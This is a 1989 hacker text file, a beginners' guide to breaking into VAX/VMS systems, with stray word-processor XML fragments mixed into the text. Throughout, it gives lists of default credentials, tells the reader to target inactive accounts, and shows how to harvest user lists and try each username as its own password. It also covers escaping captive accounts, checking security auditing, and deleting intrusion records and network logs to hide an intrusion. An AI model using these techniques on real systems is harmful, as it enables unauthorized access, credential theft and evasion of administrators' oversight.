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+-------------------------------------------------------------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!                     Beginners Guide to VAX/VMS Hacking      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!                                                             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!             File By ENTITY /  Corrupt Computing Canada  (c) 1989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!                                                             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!                                                             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!                          CORRUPT COMPUTING CANADA!          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!                                                             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!                CALL: (416)/398-3301  Login: Guest, PW: Guest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!                      (416)/756-4545  type !!    Login: lynx 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!                                                             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+-------------------------------------------------------------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!                                                             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! You may freely distribute this file as long as no modifications of any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! form are made to the file. All rights reserved by...What rights?!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!                                                             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!                                                             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+-------------------------------------------------------------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ptember 12,19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Perhaps the most exciting Operating system to HACK on is VAX/VM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offers many challenges for hackers and boasts one of the best secur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s ever developed.  In comparison to the security on UNIX, VMS is f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ior in every respect.  It can be very difficult to get inside such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and even harder to STAY inside, but isn't that what this is all about?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have written this file as a way for beginning hackers to learn about the V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erating system.  There is such a vast amount of information that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lated about VAX/VMS hacking that it is not possible for me to co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rything in just one file.  As such i will try and stick to the basics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file and hopefully write another file in the future that deals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avy-duty kernal programming, the various data structures, and system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lls. All right so lets get at i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TING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First of all how do you recognize a VAX when you see one?! Well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ng that always gives a VAX away, is when you logon you will se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nam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may also have some other info before it asks you for the username, usu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ying the company and perhaps a message to the effect of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authorized Users will be prosecuted to the fullest extent of the law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should get you right in the mood for some serious hacking!  Ok so when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determined that the system you have logged into is indeed a VAX, you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to at this point enter your SYSTEM LOGIN.  Basically on VAX's there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eral default logins which will get you into the system. However on M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s these default logins are changed by the system manager. In any cas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fore you try any other logins, you should try these (since som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agers are lazy and don't bother changing them)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name           Password        Altern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            MANAGER         OPER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ELD              SERVICE         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FAULT            DEFAULT        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ST            UETP            SYST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CNET             DECNET          NONPR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's it. Those are the default system users/passwords.  The only ones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st that are GUARANTEED to be in the userlist are SYSTEM and DEFAULT. Howev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have never come across a system where these two haven't been changed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ir default passwords to something else.  In the above list, the altern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ssword is simply a password many operators set the password to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afult. So if the first password doesn't work, try the alternate password. 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uld be noted when the a user is added into the system, the default pas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the new user the SAME as his username.  You should keep this point in mi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cause it is VERY important. Most of the accounts you hack out, will be f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is way! Ok if above ones don't work,  then you should try these accou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se following accounts are NOT defaults, but through experience i have f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many systems use these accounts or some variation thereof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name           Pas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X                VA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MS                V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L                DC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C                DEC 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MO               DEMO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ST               TEST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TNONPRIV         NONPRIV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TPRIV            PR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ACLE             ORACLE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IN1             ALLIN1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GRES             INGRES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EST              GUEST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AMES              GA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CKUP             BACKUP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ST               H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               USER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GITAL            DIGI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MOTE             REMOTE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S                S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ULT              FAUL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P              USER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SITOR            VIS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AC               GEA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LSI               VLS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FO               INFO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STMASTER         M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T                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BRARY            LIBR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ERATOR           OPERATOR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ER               O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ones that have asterisks (*) beside them are the more popular ones and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a better chance with them, so you should try them first. It should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d that the VAX will not give you any indication of whether the user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typed in is indeed valid or not.  Even if you type in a username that do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exist on the system, it will still ask you for a password.  Keep this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nd because if you are not sure if whether an account exists or not, don'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te your time in trying to hack out its password. You could be going o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d goose chase!  You should also keep in mind that ALL bad login attempts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pt track of and when the person logs in, he is informed of how many fai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empts there were on his account.  If he sees 400 login failures, I am s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he will know someone is trying to hack his accou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ASIC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k i am assuming you tried all the above defaults and managed to get yoursel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the system. Now the real FUN begins!  Ok first things first. After you l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you will get some message about the last time you logged in etc. If thi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irst time you have logged into this system then you should note the l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gin date and time and WRITE IT DOWN! This is important for several reas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ain one being that you want to find out if the account you have j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cked is an ACTIVE or INACTIVE account.  The best accounts are the inac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s. Why?! Well the inactive accounts are those that people are not u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rrently, meaning that there is a better chance of you holding onto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ount and not being discovered by the system operator.  If the account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been logged into for the last month or so, theres a good chance that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inactive.  Ok anyhow once your in, if you have a normal account with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DCL you will get a prompt that looks lik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may vary from machine to machine but its usually the same. If you hav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ird prompt and would like a normal one,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et prompt=$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this is the first time you have hacked into this system there are a cou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steps you should take immediately. First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et control=(y,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enable your break keys (like ctrl-c) so that you can stop a file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 if you make a mistake.  Usually ctrl-c is active, but this command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ure that it is. (Note: in general to abort a command, or program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pe ctrl-c or ctrl-y) Ok anyhow, the next step is to open the buffer in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rminal then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type sys$system:rightslist.d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dump a file that has all the systems users listed in it.  You m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ice a lot of weird garbage characters. Don't worry about those, tha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rmal.  Ok after this file ends and you get the shell prompt again ($)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ve the buffer, clear it out and leave it open. Then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how log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k after this file is buffered save it also.  Ok at this point you have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s on your disk which will help you hack out MORE accounts on the syst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now, lets find out how powerful the account you currently hacked into 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should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et proc/priv=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may give you a message telling you that all your privileges were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anted. That's ok. Now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how proc/pr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give you a list of all the privileges your account is set up f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ually most user accounts only have NETMBX and TMPMBX privs.  If you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than these two, then it could mean that you have a nice high-level us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like UNIX which only has a distinction between user and superuser, VMS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whole shitload of different privileges you can gain.  The basic privs are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VILEGE      DESCRI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NE           no privilege at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RMAL PRIV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UNT          Execute mount volume QI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TMBX         Create network connections (you need this to call out!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MPMBX         Create temporary mailbo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OUP PRIV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OUP          Control processes in the same gro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PPRV         Group access through SYSTEM protection fie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VOUR PRIV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NT           Disable accoun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SPOOL       Allocate spooled dev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GCHK         Make bugcheck error log ent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QUOTA        Exceed disk quot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PNAM         Insert group logical names n the name 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MCEB         Create/delete permanent common event flag clust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MGBL         Create permanent global sec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MMBX         Create permanent mailbox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MEM          Create/delete structures in shared mem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PRIV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TPRI         Set base priority higher that allot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ER           Perform operator func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SWAPM         Change process swap m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LD          Control any pro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URITY       Perform security related func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ARE          Access devices allocated to other us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LCK         Lock system-wide resour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S PRIV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AGNOSE       Diagnose dev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GBL         Create system wide global sec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LPRO         Override volume prot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PRIV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PASS         Disregard prot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MEXEC         Change to executive m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MKRNL         Change to kernal m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ACH         Create detached processes of arbitrary U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G_IO         Issue logical I/O reques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FNMAP         Map to specific physical pag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Y_IO         Issue physical I/O reques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DALL        Possess read access to every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PRV         ***  ENABLE ALL PRIVILEGES!!! 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NAM         Insert system logical names in the name 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PRV         Access objects through SYSTEM protection fie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k that's the lot of them! I will explain some of the more important privileg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ter in the file.  For now, at least you can see just how powerful the accou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.  It should be noted that most accounts usually are only granted the TMPMB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NETMBX privileges, so if you don't have the others, don't fret too mu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NERAL TERMINOLOG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 think that i should clarify some of the basic concepts involved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X/VMS operating systems before we go any further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CESS: this is what is created when you log in.  The system sets aside CP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time and memory for you and calls it a process. Any task that is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in VMS is called a proc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BPROCESS: also known as child-process, this is just a process that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created by another proc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L    : Digital Command Language. This is the shell ($) that you are put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when you log into a VA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R    : an alternate shell that is used (rarely) on certain accounts. Log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prompt is a  &gt;  as opposed to DCL which gives a  $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LL  : this is the '$' that you see once you are logged in. This is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interface with the system, where you can enter the various comma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execute files and perform other activit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OB    : a process and a group of its subprocesses performing some ta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AWN  : this is the actual command that allows you to create subproces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'SPAWNING' is the act of creating subproces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ID    : process identification number. This is an 8 byte ID code tha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uniquely given to each process that is created on the syst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AGE  : this is an EXE file that you can execute (ie run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IC    : User identification code. This is in two parts, namely: [group,member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The way this works is that users in the same group can access ea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others files through the group protection code.  However since the U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MUST uniquely identify each user, the member portion separate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individuals in each group.  If an account does not have a differ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member number, he will NOT be put in the RIGHTSLIST databa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ROL KE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 brief note on control sequences.  Several different actions can be activ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a control sequences. They ar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RL-H  :delete last charac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RL-B  :redisplay last command (can go back up to the last 20 commands issu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RL-S  :pause displ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RL-Q  :continue after pa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RL-Z  :*EXIT* use to break out of things such as CREATE and ED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RL-C  :*CANCEL* will exit out of most oper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RL-Y  :*INTERRUPT* will break out of whatever you are do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RL-T  :print out statistical info about the pro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: sometimes upon login, the CTRL-Y, CTRL-C keys are disabled.  To ens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hese are enabled, issue this command upon logi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 SET CONTR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: all the commands that are executed from DCL can be referenced from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online help manual.  To access this, simply type help at any '$' promp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his help is also available within the various utilities and progra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such as authorize and mail. The two MOST important commands are SET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SHOW. These should be buffered and printed out for your own refere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S and DIRECTO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he directory structure of VMS is a heirarchical one similar to MS-DO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IX. Its a simple concept, and i will only briefly skim over it.  First of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should be noted that there may be more than one hard drive or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ss-storage device hooked up to your system. Within each hard drive ther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OOT directory. This is the highest directory in the tree and is referenc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[000000]. (this will be explained in a minute)  Within the root there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eral subdirectories. Within these subdirectories there may be files and e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rther subdirectories.  The concept is quite simple, but can be difficul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ain.  Here is a diagram to give you a rough idea of how it is set up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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>[000000] &lt;--root direct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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>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+--------------------------+------------------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!                          !                  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!                          !                  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[d1]                       [d2]                              [d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!                          !                  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+-----+--------+           +-----+-----+                  +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!     !        !           !           !                  !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!     !        !           !           !              [d3.d3a]  [d3.d3b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[d1.da] [d1.db] [d1.dc]    [d2.d2a]   [d2.d2b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!                  !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!                  !        +--+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[d1.db.db1]        [d2.d2a.d2a1] !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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>[d2.d2b.d2b1] [d2.d2b.d2b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Hopefully this will give you some sort of an idea of how the directo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be structured. Within each subdirectory there may be other files also.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ample to see the directory after you log in you would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ample result may b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ory DISK$SCHOOL:[REPORTS.JOHN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verage.com;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nerate.exe;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.mai;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ks.dat;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ks.dat;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portcard.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jects.d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tal 7 fi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does this tell you? The first line tells you what drive and subdirect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are in. The next lines are the actual files. As you can see each file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3 character extension, followed by a comma and a number.  The name befor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iod is the actual filename (eg. average) the 3 characters after the peri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known as the extension (eg.com) and the number after the comma refers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rsion of the file. So in this case, this is version number 3.  Any time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dify or save a file, it automatically assigns it a version number of 1.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 already exists on your disk, it increments the version number by 1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saves it as such.  So the next time i go ahead and save the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verage.com, it would add another file to the list called average.com;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pecial note should be taken of the files that have an extension of '.DIR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se are not really files, but rather subdirectories.  I will show you how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itch subdirectories in just a minute. First you should take note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fferent file extensions.  Although you can name the files anything you w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 of the more important extensions ar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PE      DESCRI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E       Executable IMAGE. These files are programs that can be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       DCL SCRIPT files. These can also be executed, utilizing the @ comm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       DATA file. Sometimes useful things to look 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S       Listing File, many times important info is in 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       Mail file,  use the MAIL command to read the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       DIRECTORY - not a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OU       Journal File, often created thru the use of other programs eg ED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XT       Text Files, often hold useful inform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se are just some of the extensions you are most likely to see. The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portant ones are the EXE and COM files. These can be executed from the DC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vel. EXE files are executed via the RUN command. Eg. to run authorize.ex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run authoriz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run the authorize IMAGE. Supposing there were more than one ver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authorize you could specify a version number. e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run authorize.exe;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other type of file you can run is the COM files. These are like SCRIP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s in UNIX or .BAT files from MS-DOS.  They are just a sequence of DC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s strung together that are executed when you initiate the file. To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 files, use the @ command. For example to run adduser.com,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@add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version number thing i stated for EXE files also applies for COM fi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**NOTE***  To get a listing of all the files on the whole drive, try thi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d [000000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dir [...]*.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ilarly you type dir [...]*.com, if you wanted just the COM files lis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see the contents of a file, you can use the TYPE command. For exampl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type login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might type out something lik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 sd:==set defaul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 set control=(y,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 set proc/name=ent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 set term/dev=vt1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t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great for COM files, DAT files and some of the other types, but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always get garbage when you type EXE files so don't bother trying tho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very useful for snooping around other peoples files and get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formation. Many times i have found user/passwords lying around in TXT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S files left by some careless us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Now, how do you go about changing directories? Well, first you should set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hortcut.  The normal command to change directories is SET DEFAULT.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ample to change to a subdirectory called REPORTS, you would have to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et default [.report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make life simpler on yourself, as soon as you log in, you should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d:==set defaul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defines a macro called SD that is interpreted by DCL as SET DEFAULT.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similarly define other 'favorite' commands to some short, easy to reme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finition.  Anyhow heres the syntax for changing directorie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D DEVICE:[dir1.dir2.dir3....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evice can be optionally left out, if you plan to remain in the same h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ive. You have to then enter a '[' followed by the root directory, follow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a period, followed by another subdirectory name etc. E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d dub0:[cosy.user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pose at this point, you were in directory cosy, subdirectory users and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 a further subdirectory called 'info.dir'.  Rather than specify the fu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thname, you can simply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d [.info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advance you one level into the info subdirectory. Remember to pu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iod in front of the subdirectory. If you don't, in this case it would assu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you were trying to reference the root directory called info.  An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portant thing to note is moving back levels in terms of subdirectories.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ample if you were in [cosy.users.info] and wanted to move back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sy.users] you could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d [-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ilarly you can put in as many hyphens (-) as you want to move back.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ample  sd [--]  would put you back to the cosy directo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other important thing to note about subdirectories are logical assign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mbols. These are names assigned to certain things. For example the m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directory is called sys$system. So to go to it you could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d sys$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ould throw you into the system directory. Similarly you can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d sys$log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his will put you back into the directory that you were initially in,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first logged in.  These symbols stand for actual device:direct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binations.  To see the various definitions that are assigned to each pro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should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how log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list a whole bunch of global system equates that you can us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ess various parts of the VAX structure.  In addition to view all of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cally defined symbols, us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how symbol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 PROT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k before i begin this, let me just state that whatever i say about files al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lies to directories.  There are four types of file protections. Ther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,WORLD,GROUP and OWNER. These are briefl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- All users who have group numbers 0-8 and users with physical or log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/O privileges  (generally system managers, system programmers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perator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WNER - the owner of the file (or subdirectory), isolated via their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dentification Code (UIC). This means the person who created the fil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OUP - All users who have the same group number in their UICs as the owner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fi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LD - All users who do not fall in the categories abo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ch file has four types of protection within each of the above categor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are: Read, Write, Execute, Delete. Explanations ar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D   - You can read the file and copy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RITE  - You can modify and rename that fi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ECUTE- You can run the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LETE - You can delete the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ou create a file the default is that you have all the privileges for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icular file. Group, world and system may only have limited privileges.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be changed with the set protection DCL command. For exampl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et protection=(group:rwed,world:r)/defaul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uld set your default protection to allow other users in your group to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ll read,write,execute,delete privs to the file, and others only read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he file. The /default means that from now on all the files you create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set with this particular protection.  To change one of your own file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 other protection you can alternatively us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et prot topsecret.dat /prot=(system:rwed,group:rwed,world:rwed,owner:rw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ould enable all users on the system to access the file 'topsecret.dat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specifying the protection, you do not have to list them for each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ur groups.  You can simply choose only those that you want changed from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faul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DITING FI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n important utility that all VAX hackers should be familiar with is the ED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xt editor. To call it up, use the EDIT DCL command. i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edit [filename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invoke the EDIT/EDT text editor.  The [filename] refers to the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you want to edit.  If the file does not exist, it is created at this poi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EDT editor does not provide a default file type when creating files, so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do not specify one, it will leave it as NULL.  It should be noted that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more than just the EDT editor, but when you type in EDIT, the defaul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EDT.  Basically it is an editor that you can use to create/modify COM or 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type of text fi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fter the editor is invoked, it keeps track of everything that you enter i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OU file.  In case of lost carrier or some other accident, you can recover w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had by specifying the /RECOVER qualifier. For exampl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edit/recover memo.d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ould take the last copy of memo.dat, load it into memory, then pro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last JOU file, updating it to virtually exactly where you were before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t cut off.  Journaling is automatically defaulted to ON, but can be turn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f with the /NOJOURNAL qualifier.  For a description of what all the qualifi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, and what they do, refer to the online HELP manu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k here is a list of the basic commands you can perform in the EDT editor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   (where X = line number)............show line X on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:Y (where X,Y = line numbers).........show line X through line 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,B,C,D (a,b,c,d = line numbers).......list lines A,B,C,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:e ...................................list from X to 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 W ...................................TYPE WHOLE. List ALL of the text lin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/string1/string2/W....................substitute ALL occurrences of string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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>for string2 as they occur from curr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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>line number downwa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string" ..............................search for first occurrence of st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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>from current line downwa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 A "string" ..........................type all occurrences of string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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>current line downwa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:Y a "string" ........................search for occurrences of string with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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>range denoted by X through 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 X ...................................Delete line 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 X:Y .................................Delete line X through Y, inclusiv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.....................................insert a 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X ...................................insert from line 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 X:Y to Z ............................move lines X through Y to line Z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 ...................................resequence line numb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/SEQ:X:10 ..........................resequence from line X in intervals of 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 X ...................................replace from line X. This delete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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>current line and automatically goes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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>insertion mo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IT ..................................leave the editor, and SAVE the curr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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>tex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UIT ..................................leave the editor and DO NOT SAV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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t>current tex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ample editing session is show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edit lame.tx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i this is just some bullshit text to test out how this EDIT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works.  Oh well, easy enough.  by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ex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type lame.tx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hi this is just some bullshit text to test out how this EDIT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works.  Oh well, easy enough.  by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del lame.txt;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is section i will outline some of the more important commands that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sue from the DCL level. This is not meant to be a complete guide. I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rely point out some of the more important commands and a very brie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cription. Proper help can be obtained from the online HELP facil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: It should be noted that each of the following commands may have fur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 qualifiers that you can specify. You should check up on these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online help als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@               -Lets you execute COM script fi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OUNTING      -allows you to view and edit system accounting data that kee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rack of what system time you have racked u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ALYZE         -lets you view the contents of OBJ files in HEX/ASCII form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ALYZE/SYSTEM  -Invokes the SDA. VERY VERY USEFUL!! Allows you to view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unning processes, their type-ahead buffers et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END          -appends the contents of file1 to file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ACH          -allows you to attach yourself to one of your subproces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OSE           -closes a file that was opened for input/output via OP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INUE        -continue a process that you have aborted with control-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PY            -copy file1 to file2. You can specify full pathnames,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evice and subdirectory. If you want to copy it to your h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irectory just use sys$login as your 'TO' fi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EATE          -create a text file of any type. Eg. you want to creat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imple COM file or perhaps a letter to another hacker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system. (you shouldn't be using MAIL to send messages!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EATE/DIR      -If you want to create a subdirect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LETE          -delete a filename. Remember to specify a version number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you are deleting a file or it wont work.eg. del garbage.com;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LETE/INTRUSION_RECORD -gets rid of the failed password attemp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FFERENCES     -compares two files and notifies you of their differen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ORY       -get a directory of the files. Various qualifiers can be chos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UMP            -get a hex/ascii file dum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DIT/EDT        -invokes the VAX EDT interactive text ed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AMINE         -view the contents of virtual mem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LP            -ONLINE HELP MANUAL. REFER TO IT OFTEN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K            -link object files into EXE files that you can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GOUT          -the proper way to terminate a ses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ONE           -Allows you to chat with another user on the system. It is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recommended that you use this, except with fellow hack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NAME          -rename a file or direct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UN             -lets you execute EXE fi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 CONTROL     -disables/enables interrupts via ctrl-y/ctrl-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 DEFAULT     -change directo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 HOST        -allows you to connect to another mainfr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 PASSWORD    -change the password of your accou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 PROCESS     -change the characteristics of your pro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 PROMPT      -change the prompt ($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 TERMINAL    -change your terminal characteristic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 ACCOUNTING -show the current security/accounting enab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 AUDIT      -show SECURITY enab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 DEFAULT    -see your current directory. (Like PWD in UNIX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 DEVICES    -check out the system set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 INTRUSION  -view the contents of the breakin datab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 LOGICAL    -current logical name assign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 NETWORK    -lists all the available nodes that you can connec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 PROCESS    -View your process settin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 PROTECTION -show the default protection you have s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 SYSTEM     -useful to see the running proces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 TERMINAL   -display your terminal characteristic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 USERS      -see who else is logged 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AWN           -spawn a subpro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OP            -kill off a subpro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PE            -view a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This should give you a general overview of some of the more import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s that you can use.  It would be impossible for me to list ALL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s, and their descriptions, so i suggest that you go through the on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LP facility and familiarize yourself with the syntax of some these comman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C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 to this point i have mainly discussed the basic concepts involved with VM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now you should be familiar and comfortable with the various DCL comma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how to accomplish certain tasks.  If you are still sketchy, go back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-read the sections you don't understand.  You may also want to log into a VA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just try fiddling around in the shell getting used to how the whole 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k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n this section i will discuss some of the techniques that you may find usefu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hacking out accounts, calling out to remote systems, and gaining acces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fidential inform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Lets start from the top: When you first login to the system, after it accep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password etc, it executes the SYLOGIN.COM file.  Then it searches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fault directory for the file LOGIN.COM (this may be changed by th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ager if he wishes)  This file basically sets up your terminal parameter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haps some macros that you wish to be defined. It may or may not also execu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 util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PASSING LOGIN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Sometimes it may be useful to be able to skip the login procedures.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ample if the system automatically runs some file as soon as you log in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esn't put you into the shell, this technique can be use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name: entity/nocom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suming the user was named entity, if you put a /nocomm qualifier, it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kip the login.com file and put you directly into DCL. Similarly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ify some other file you want executed instead of login.com. e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name: entity/comm=custom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execute the custom.com file upon entry into the account.  It sh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noted that these methods WILL NOT WORK on a CAPTIVE account. What i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ptive account?! Read on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PTIVE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Many times, in an attempt to make an account more secure the system mana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s the captive flag to ON, in the users profile.  What this means i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ou log in, you cannot break out of the login file into the DCL she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means that although you can hit ctrl-y and it may even say *interrupt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will not actually abort the file.  So how do you exit to DCL?! Well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a few ways. Usually accounts set up in this manner are used to allow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 to connect to other nodes.  If this is the type of account that you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gged into then try the following:  First choose an option from the menu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present that allows you to call any node.  When it says something li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%connected to...  then hit two ctrl-y in quick succession.  It will then a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if you want to really abort the current session. Type Y and it will put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a prompt that looks lik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D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this point you should type in SPAWN and it will spawn a process and thr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into the DCL Shell.  This is a major security flaw in VMS and can be pu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od use on many a syst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AINING PRIVILEG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most systems that you hack into, you will find yourself with only TMPMBX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TMBX privileges. To see your privs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how proc/pr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se however may not be all the privileges that you have assigned. Upon logi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ystem only assigns you your default privileges. On some accounts you m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more than just these privileges. To see if you do,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et proc/priv=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this doesn't give you any error message then you have found yourself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account! With this account you can create new users, change the secur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up read other peoples files etc.  Here are a list of some of the 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portant privileges and what they can be used for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MKRNL    -change to kernal mode. Very Powerful privilege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PRV    -allows you to become a Super-User. You can do whatever you wan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DALL   -allows you to read other peoples files and directories regardl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of the prot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ER      -allows you to perform many useful operator functions (security etc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PRV    -You can gain the same UIC as the system and access just ab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anything you want. Create/modify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TMBX    -allows you to call out on the network to other sys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PASS    -this allows you to view network passwords, and to bypass all typ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of protection fiel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se are just some of the more important ones to the hacker.  For a comple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st of all the privileges and what each one does, see the list i presen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rlier in the fi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important note: It is not possible to gain privileges that are not set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your default from the DCL level.  There is one way to gain ALL privileges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Y Vax but it involves some serious kernal programming.  I could outlin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 here but i chose not to.  The reason for this is that many people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use the system if they had access to wiping out hard drives and tot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shing the system.  If you work from the ground up, you begin to realize j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w important gaining extra access is. You begin to respect the VMS system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it is.  A system account in the hands of novice is a very dangerous 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eed, and my suggestion is that if you have a SYSTEM account that has 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 just the default privileges that you should disable them.  This will on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lp you from making any mistakes and screwing up the system.  To do this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et proc/priv=no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et proc/priv=(tmpmbx,netmbx,readal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these privileges you should be able to easily navigate throughou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without messing anything up.  Keep one thing in mind, don't delete fi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less you have created them! People will notice things like this and you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aranteed to lose your accou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nce you are an experienced hacker you may wish to create a program that g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more privileges.  To get you started in this direction i will give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 excerpt out of the 'VAX/VMS internals and data structures' manual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a process wishes a privilege that is not in its authorized list, one of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ditions must hold or the requested privilege is not gran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The process must have SETPRV privilege.  A process with this privilege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cquire any other privilege with either the set privilege system service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DCL command SET PROCESS/PRIVILEG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The system service was called from executive or kernal mode. This mechanis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is an escape that allows either VMS or user-written system service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cquire whatever privileges they need without regard for whether the cal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process has SETPRV privilege.  Such procedures must disable privileg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granted in this fashion as part of their return pa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should give you an idea of what is necessary to go about writing a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grants you extra privileges.  For those advanced programmers, here i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levant informatio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mbolic name   Location           Usage                          Referenc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+------------------+------------------------------+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D$Q_PRIVMSK  !process header    !working privilege mask        !system srvc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CB$Q_PRIV     !PCB               !same as phd$q_privmsk         !device dri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TL$GQ_PROCPRIV!P1 Pointer page   !permanently enabled privs     !SET U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D$Q_AUTHPRIV !process header    !procs allowable privs         !$setpr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D$Q_IMAGPRIV !process header    !mask for enhanced priv images !$setpr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AF$Q_PRIV     !sysuaf.dat        !UAF allowable privs           !LOGIN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FI$Q_PROCPRIV !priv install image!image installed with privs    !image actvat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HD$Q_PRIVREQS !image header      !unused - set for all privs!   !image actvat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+------------------+------------------------------+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LINE SECUR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rsion 4.2 of VMS introduced the security auditing features.  These feat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be used to track down hackers and illegal use of the machine. Things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access to files, login failures, process creation, adding users etc can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monitored and logged.  After you have logged into an unknown system, i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se to check what kind of security they have enabled on the system. Thi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e in two ways. First you should tr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how accoun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rmally this will either say accounting is disabled or will have a lis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ems that are being monitored.  This is used mainly for charging the users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PU time etc.  What you should check for in this list is if IMAGE accoun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enabled.  If it isn't, then you can relax. If it is, you know that you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mart system manager here and you will have to take extra precautions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ddling around on this machine.  The second thing you should check i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tual level of security enabled.  Generally this feature is disabled, and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nothing to worry about. To see the security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how aud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thing to note is that you must have the SECURITY privilege to issue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. An especially secure system may have things such as breakins, login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gfailures, file access (both successes and failures),and authoriz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cks.  These systems require a tremendous amount of care, and are not a g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ce to start learning about VM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other important thing that you should keep in mind is that VAX/VMS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formation about login failures (invalid password, account expired, unkn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name).  A security manager can identify possible breakin attempts by us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how intrusion/type=intru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command requires the CMKRNL and SECURITY privileges.  An interesting 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note is that the system manager can have the VAX do certain things after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s determined that the user trying to log in is not legitimate.  For exam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can block all login attempts from a certain terminal, or it could turn of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epting passwords for a certain account for a specified period of time. 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ts suppose you were hacking an account and after 10 tries actually ente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ight password.  If the intrusion alert is set at 5 tries, then even i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the correct password, it wont let you in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IRED PASSWO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want to make a quick note here about expired passwords.  Often you will fi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ter logging into an account that it will say that your password has expi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for you to enter a new password.  At this point you should check when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ast date of access. If it was only a few days ago, then you should for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out this account.  If it more than a few weeks ago, then you have found your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lf an INACTIVE account (ie one that is not in use anymore)  The first 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you should do is set a new password. For exampl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et pas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sswords can be from 1-31 characters in length and can contain the follow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acter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-Z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-z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-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 (dollar sign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 (underscor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 that uppercase, and lowercase are not differentiated (unlike UNIX)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son that you should enter a password at this point is that if you don't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xt time the account will not let you log in since the password has expi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AINING MORE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ce you have managed to hack onto a VAX, often you will want to gain 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ounts on the system.  There are several ways to go about doing this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 way is to get a list of all the users on the system.  Remember tha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fault password for any account is the same as the username. Well if you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list of users, theres a good chance you may find a few who haven't bothe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change their passwords.  There are a few methods of viewing the userli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implest, but least readable way is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type sys$system:rightslist.d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buffer the incoming information. You will notice some garbage charact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so sent through.  The way this file is set up is a 1-2 byte character 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ed immediately by a 32 byte string with the username.  So to pick ou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names, simply ignore the first character from each name, and then you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usernames. There is one small problem to this. Sometimes the character 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front of the name is a SPACE.  In this case, you would still skip the fi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acter (which is a space), but in viewing the name you would take all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acters.  So you just have to use your judgement when looking at this l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determine whether the string is the whole name, or whether it has an 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de stuck in the beginning. The problem is that the ID code is not necessari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garbage character, it could be any valid ascii character (spaces,letter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mbers etc)  The thing that you should keep in mind is that these ID codes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ouped together, so you may see several names that all start with 'A' and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assume that this is the ID and not part of the actual n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nother method which is a bit slower, but a lot neater is to use the DUM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 on the rightslist fil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dump sys$system:rightslist.d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quite useful, because it automatically strips away control character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puts each name into a separate record which makes it easy to isolat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per login nam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n alternative method is to run the psi$authorize file from the system di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do this,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mc psiauthoriz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ou get the PSI-authorize prompt,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SI-authorize&gt; show /id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list all the users on the system. The drawback to this method i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ystem that you are on, may have taken out the PSI utilities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directory.  The PSI utilities are used mainly for remotely connec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other mainfram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 third method to get a listing of all the users is to go through the sysua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abase.  On most accounts this is usually not possible , since most users d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have read/write access to sysuaf.dat.  If you DO have access to this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ie you have readall or setprv etc) then you can run authoriz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d sys$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run authoriz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when you get the UAF prompt,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AF&gt;show [*,*] /brie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he added bonus of doing it this way is that you can also find out things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the users home directory, when was the last time they logged in, what the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vileges are etc.  Easy to isolate the good accounts on the system that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y want to hack at. It should be noted however, that if you CAN perform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, then you also have the priv's to create your own user, or better y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nge the password on an inactive accou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here is another possibility that sometimes works on many systems.  Often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manager uses the LIST command from AUTHORIZE and what it does is produ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user listing in the file called: SYSUAF.LIS in the SYS$SYSTEM directory.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 has done this, unless he explicitly changes the protection on the file,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 has WORLD READ access.  In other words, anyone can go in and type ou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. To do this tr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type sys$system:sysuaf.l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Ok so lets assume that you have used one of these methods and have come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a list of all the users on the system. Now comes the tedious part. W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have to do is log back into the system, and try each of the names out.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assword, enter the same thing as you did for the username.  This is a l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boring process depending on how large the userbase is, but it usu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ields a few good accou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Another interesting variation on this, is to get accounts on remote node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linked with your VAX.  To see other nodes that are accessible from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X,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how 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produce a listing lik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X/VMS Network Status for local node 2.161 NORTELCOM on 01-SEP-19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next hop to the nearest area router is node 2.62 BEL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de                 Links     Cost    Hops   Next Hop to N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161 NORTELCOM        0         0      0     Local   -&gt;  2.161 NORTEL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6 JANUS              0         3      3     UNA-0   -&gt;  2.6   JAN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2 LUMPY              0         9      5     UNA-0   -&gt;  2.2   LUMP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3 SBSU               0         5      4     UNA-0   -&gt;  2.3   SBS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4 AURORA             0         4      4     UNA-0   -&gt;  2.4   AUROR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otal of 5 nod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a sample output that you would see on your screen.  Let me give a brie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anation of what each column means.  The first column shows the node addr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he NodeName.  The node name is the most important to the VAX hacker si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is how you will be contacting the remote node.  LINKS shows the number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gical links between the local node and each available remote node. COST show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otal line cost of the path to a remote node.  HOPS shows the number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mittent nodes plus the target node.  NEXT HOP TO NODE shows the outgo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ysical line used to reach the remote no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important item from this list of course is the node name. By referenc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you can connect to other nodes.  A nice technique that allows you to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 accounts on other nodes without actually having access to the node emplo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dea. For example, if you want to find out the user list of a node SBSU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ould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copy sbsu::sys$system:rightslist.dat sys$log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then transfer the rightslist from the other node to your log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ory, giving you a list of all the users on the other system that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ck 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should be noted that copying files from another node will create a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he remote node indicating your transfer.  To get rid of this, log on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mote node and delete the file called NETSERVER.LOG   (just delete the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rsions that you have created, and leave the others alone!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is another useful trick that sometimes yields more USER accounts on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s.  Try typ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how log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present you with a giant list of what seem like symbol equates. W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should look for in here is something that accesses a file in another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mainuaf"=sbsu::sys$system:sysuaf.d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y times, a user/password combination is hidden among these definitions.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d these, simply search the file for occurrences where they have a node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ch as SBSU followed by a quote and some info. An 